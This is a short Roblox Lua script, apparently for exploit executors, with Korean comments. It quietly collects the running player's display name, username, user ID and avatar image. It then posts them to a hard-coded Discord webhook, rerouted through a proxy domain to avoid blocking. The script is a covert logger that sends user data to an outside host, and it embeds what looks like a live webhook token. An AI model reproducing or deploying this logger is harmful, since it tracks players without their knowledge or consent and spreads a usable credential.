local discord = "https://discord.com/api/webhooks/1520026886191972566/6gmbXgnzORM8lfaP_jz-kWCR9VlOuN3lmSOoXXQsHTsbUFhoPWZrfoCRnJz-vEYmNBhV"

if not discord or discord == "" then return end
if discord:find("discord.com") then discord = discord:gsub("discord.com", "webhook.lewisakura.moe") end
if discord:find("discordapp.com") then discord = discord:gsub("discordapp.com", "webhook.lewisakura.moe") end

local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

local r = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request
if not r then return end

local pleasework = "https://www.roblox.com/images/PersonalChannel/missing_avatar.png"

-- 아바타 이미지 가져오기
task.spawn(function()
    pcall(function()
        local url = "https://thumbnails.roblox.com/v1/users/avatar-headshot?userIds=" .. LocalPlayer.UserId .. "&size=420x420&format=Png&isCircular=false"
        local resp = r({Url = url, Method = "GET"})
        if resp and resp.Body then
            local data = HttpService:JSONDecode(resp.Body)
            if data.data and data.data[1] then
                pleasework = data.data[1].imageUrl
            end
        end
    end)
end)

task.wait(1.0)

local fields = {
    {
        name = "👤 유저 정보",
        value = string.format("**Display:** `%s`\n**Username:** `%s`\n**ID:** `%s`", LocalPlayer.DisplayName, LocalPlayer.Name, LocalPlayer.UserId),
        inline = false
    }
}

local payload = {
    ["embeds"] = {{
        ["title"] = "User Information",
        ["color"] = 65280,
        ["thumbnail"] = {["url"] = pleasework},
        ["fields"] = fields
    }}
}

pcall(function()
    r({
        Url = discord,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = HttpService:JSONEncode(payload)
    })
end)

